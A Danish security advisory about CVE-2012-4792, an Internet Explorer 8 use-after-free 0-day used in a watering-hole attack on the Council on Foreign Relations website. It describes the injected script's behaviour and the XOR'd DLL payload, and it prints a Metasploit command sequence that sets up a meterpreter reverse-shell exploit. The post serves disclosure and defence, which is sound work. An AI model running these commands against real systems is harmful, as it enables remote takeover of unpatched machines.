En kritisk 0-dags sårbarhed, som er blevet misbrugt i målrettede spear phishing angreb udført mellem jul og nytår, hjemsøger Microsoft Internet Explorer 8.x og ældre versioner.
Der er desværre allerede frigivet detaljerede oplysninger om sårbarheden samt modul til Metasploit. Sårbarheden kan udnyttes til at afvikle arbitrær kode mod mål som kan lokkes til klikke et link eksempelvis fremsendt via en e-mail, eller ved at besøge en kompromitteret webside.
Vi er bekendte med at hjemmesiden tilhørende "Council on Foreign Relations" (CFR) over et par dage i indeværende uge har leveret skadelig kode mod websidens besøgende. Der er således tale om et "waterhole" drive-by scenarie, som bl.a. har været anvendt til at trænge længere ind i netværket hos CFR via klient infektioner, men også et angreb der kan påvirke talrige andre organisationer som har interesse i indholdet på CFR's webside.
Det indlejrede javascript har taget højde for hvilket sprog browseren anvender og såfremt dette ikke lever op til kriterierne, som er "English (U.S.)", "Chinese (China)", "Chinese (Taiwan)", "Japanese", "Korean", eller "Russian" har det undladt at affyre sin skadelige payload. Samtidig har exploitet placeret en browser cookie for at sikre at exploitet kun leveres en gang mod en klient der besøger websiden. Samme teknik ses anvendt i kommercielle exploitkits, og skal bl.a. gøre det vanskeligere at efterforske en incident.
I det konkrete angreb mod CFR, som der er åbenhed omkring,anvendes "today.swf" (se injektet kode herunder) til at gennemføre heap spraying mod Microsoft Internet Explorer. Sårbarheden der misbruges er af typen "use after free" og optræder i MSHTML og mere specifikt objektet "CDwnBindInfo". Koden som var injektet på CFR's webside så ud som følgende:
Ovenstående script referer til "xsainfo..jpg" som er en Windows DLL, XOR'd med nøglen 0x83. Ved brug af Exiftool kan vi udtrække følgende oplysninger der afslører diverse metadata og ikke mindst en reference til filens oprindelige navn "test_gaga.dll":
SubsystemVersion.........: 5.0
InitializedDataSize......: 385536
ImageVersion.............: 0.0
ProductName..............: TODO: < >
FileVersionNumber........: 1.0.0.1
UninitializedDataSize....: 0
LanguageCode.............: Chinese (Simplified)
FileFlagsMask............: 0x003f
CharacterSet.............: Windows, Chinese (Simplified)
LinkerVersion............: 9.0
FileOS...................: Win32
MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
FileVersion..............: 1.0.0.1
TimeStamp................: 2012:12:12 11:06:04+00:00
FileType.................: Win32 DLL
PEType...................: PE32
InternalName.............: test_gaga.dll
0-dags angreb mod MIcrosoft Internet Explorer 8 og ældre
Sårbarheden ser ud til at være effektiv mod Microsoft Internet Explorer 8 og alle ældre versioner. Den er tildelt CVE-ID: CVE-2012-4792.
Med de data og detaljer som allerede nu er gjort tilgængelig, vil vi se denne sårbarhed blive misbrugt i mere vidtspredte angreb hen over de kommende måneder. Der er i den forbindelse allerede udviklet et modul til Metasploit som kan anvendes som udgangspunkt for it-kriminelle.
use exploit/windows/browser/ie_cdwnbindinfo_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
sysinfo
getuid
En demonstration af Metasploit i aktion kan findes på YouTube:
Microsoft har netop publiceret "Security Advisory 27942" (http://blogs.technet.com/b/msrc/archive/2012/12/29/microsoft-releases-security-advisory-2794220.aspx) som bekræfter sårbarheden, og som samtidig begrænser den til udelukkende at omfatte Microsoft Internet Explorer version 8.x samt ældre versioner herunder 6.x og 7.x. Nyere versioner af IE er således ikke fejlbehæftet.
Det forlyder endvidere at Microsoft allerede har en sikkerhedsopdatering klar når årets første sikkerhedsopdateringer (patch tirsdag) frigives d. 8.1. 2013. Men inden da kan vi forvente at se et "Fix-it" værktøj som temporært lapper sårbarheden indtil der foreligger et officielt patch.
Yderligere oplysninger:
http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/
http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/